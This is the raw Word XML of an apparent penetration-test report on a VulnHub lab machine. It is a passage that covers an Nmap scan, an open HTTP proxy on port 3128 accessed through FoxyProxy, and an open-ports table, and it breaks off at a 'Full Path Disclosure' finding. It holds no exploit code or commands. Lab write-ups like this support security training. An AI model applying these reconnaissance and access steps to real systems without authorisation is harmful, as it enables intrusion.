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64AAA" w14:textId="77777777" w:rsidR="00EC7BA1" w:rsidRPr="00EC7BA1" w:rsidRDefault="007F3963" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                             </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3963">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Vulnerability Report</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D8705C">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00EC7BA1" w:rsidRPr="00EC7BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00EC7BA1" w:rsidRPr="00EC7BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Executive Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB4362" w14:textId="1E2E8ED3" w:rsidR="00EC7BA1" w:rsidRDefault="00EC7BA1" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This penetration test was conducted on a target system hosted on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, with the objective of identifying and assessing potential vulnerabilities and security weaknesses. The assessment encompassed a range of methodologies, including network scanning, enumeration, and exploitation of known vulnerabilities. The findings reveal a series of critical and high-risk vulnerabilities, such as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EC7BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>misconfigurations,  and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EC7BA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> insufficient access controls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A0679" w14:textId="3E5FB3F1" w:rsidR="00AE244F" w:rsidRDefault="00AE244F" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE244F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD7702F" w14:textId="77777777" w:rsidR="00AE244F" w:rsidRPr="00AE244F" w:rsidRDefault="00AE244F" w:rsidP="00AE244F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE244F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When I identified the target, I proceeded to find its IP address. Following that, I conducted an Nmap scan to discover its operating system and open ports. During the scan, I identified an open port, specifically an HTTP proxy, indicating the presence of a proxy server set up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF789C0" w14:textId="77777777" w:rsidR="00AE244F" w:rsidRPr="00AE244F" w:rsidRDefault="00AE244F" w:rsidP="00AE244F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE244F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To establish a connection with the proxy server and gain access to the main server, I installed a software called "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE244F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FoxyProxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE244F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>." This software allows me to connect to the proxy server, enabling me to access the target's main server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466C59F3" w14:textId="77777777" w:rsidR="00AE244F" w:rsidRPr="00AE244F" w:rsidRDefault="00AE244F" w:rsidP="00AE244F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE244F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In summary, the process involved finding the target's IP address, conducting an Nmap scan to understand its system configuration, identifying an HTTP proxy, and then using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE244F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FoxyProxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE244F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to connect through the proxy server for accessing the main server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886F997" w14:textId="77777777" w:rsidR="00AE244F" w:rsidRDefault="00AE244F" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48C39169" w14:textId="77777777" w:rsidR="00AE244F" w:rsidRPr="00AE244F" w:rsidRDefault="00AE244F" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799C1E25" w14:textId="211853A9" w:rsidR="00395FE0" w:rsidRDefault="00395FE0" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395FE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detail Findings:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5381"/>
        <w:gridCol w:w="5381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E30790" w14:paraId="73CCE40D" w14:textId="77777777" w:rsidTr="00E30790">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78167B2E" w14:textId="77777777" w:rsidR="00E30790" w:rsidRPr="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E30790">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E30790">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C586E1A" w14:textId="77777777" w:rsidR="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="5155"/>
            </w:tblGrid>
            <w:tr w:rsidR="00E30790" w14:paraId="5F680366" w14:textId="77777777" w:rsidTr="00E30790">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5155" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4965BF48" w14:textId="684A3C2B" w:rsidR="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00E30790">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Linux 3.2 - 4.9</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="50CECA66" w14:textId="11809172" w:rsidR="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E0844A1" w14:textId="77777777" w:rsidR="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">               Open Ports</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1826"/>
              <w:gridCol w:w="1491"/>
              <w:gridCol w:w="1838"/>
            </w:tblGrid>
            <w:tr w:rsidR="00E30790" w14:paraId="2EE7B8D1" w14:textId="77777777" w:rsidTr="00E30790">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1826" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="08034459" w14:textId="258248AB" w:rsidR="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>PORTs</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1491" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0061CA8D" w14:textId="50D206BA" w:rsidR="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Protocol</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1838" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="42A429E3" w14:textId="7FD04420" w:rsidR="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Service Name</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00E30790" w14:paraId="652582A6" w14:textId="77777777" w:rsidTr="00E30790">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1826" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0AA9F981" w14:textId="3BA569A1" w:rsidR="00E30790" w:rsidRPr="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00E30790">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>22</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1491" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="35D57998" w14:textId="5491D34E" w:rsidR="00E30790" w:rsidRPr="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1838" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="59A68ABE" w14:textId="7DF7834D" w:rsidR="00E30790" w:rsidRDefault="00815569" w:rsidP="00EC7BA1">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>ssh</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00E30790" w14:paraId="4BAB4DE4" w14:textId="77777777" w:rsidTr="00E30790">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1826" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="6B11FC29" w14:textId="5CB717EA" w:rsidR="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00E30790">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>3128</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1491" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2C039347" w14:textId="6B3FF556" w:rsidR="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00E30790">
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1838" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2035D14E" w14:textId="60938B59" w:rsidR="00E30790" w:rsidRDefault="00815569" w:rsidP="00EC7BA1">
                  <w:pPr>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>http-proxy</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="28377D41" w14:textId="71F6A441" w:rsidR="00E30790" w:rsidRDefault="00E30790" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C265DD4" w14:textId="77777777" w:rsidR="00395FE0" w:rsidRPr="00395FE0" w:rsidRDefault="00395FE0" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1153CCFB" w14:textId="6AE9F9F6" w:rsidR="00EC7BA1" w:rsidRDefault="002C17A9" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E645E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D6FADB" w14:textId="65FBE754" w:rsidR="00ED555A" w:rsidRPr="00ED555A" w:rsidRDefault="00AE244F" w:rsidP="00ED555A">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="212529"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E645E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00ED555A" w:rsidRPr="00ED555A">
        <w:rPr>
          <w:rStyle w:val="UnresolvedMention"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C1B38">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Full Path Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B53AF" w14:textId="2C625B75" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1975"/>
        <w:gridCol w:w="8787"/>
      </w:tblGrid>
